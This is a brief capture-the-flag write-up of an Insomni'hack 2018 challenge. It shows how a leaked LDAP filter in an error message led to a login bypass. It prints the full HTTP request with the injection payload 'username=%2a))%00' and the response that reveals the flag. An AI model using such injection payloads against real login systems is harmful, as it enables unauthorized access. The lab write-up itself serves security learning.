This challenge was about LDAP injection.

Our Solution

The error message made it obvious:

<p>Error when trying to get LDAP entries for ou=web,dc=inso, filter (&(uid=*)(uid=*))(|(uid=*)(userpassword={MD5}kS7IA7LOSeSlQQaNSVq1cA==))</p>

Then it was only a matter of finding the right payload. After fiddling with the requests manually, we submitted a list of known LDAP injection payloads one after the other using Burp Intruder, and one of them worked out of the box. The final request was:

POST / HTTP/1.1
Host: authent-service.insomni.hack
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,fr;q=0.5,de;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://authent-service.insomni.hack/
Content-Type: application/x-www-form-urlencoded
Content-Length: 31
Connection: close
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache

username=%2a))%00&password=asdf

And the response included the flag:

HTTP/1.1 200 OK
Date: Fri, 23 Mar 2018 20:33:05 GMT
Server: Apache/2.4.18 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 510
Connection: close
Content-Type: text/html; charset=UTF-8


<html>
<head>
	<style>
		body {
			background-color:#799;
		}

		.authent-box {
			background-color:#eee;
			width:30%;
			margin:0 auto;
			padding:50px;
			margin-top:50px;
			border-radius:10px;
		}
	</style>
</head>
<body>
	<div class="authent-box">
		<p>You're connected. The flag is INS{ld4p_1nject10n_1s_0ld} !</p>		<form method="POST">
			<input name="username" placeholder="username" />
			<input name="password" placeholder="password" />
			<input type="submit" />
		</form>
	</div>
</body>
</html>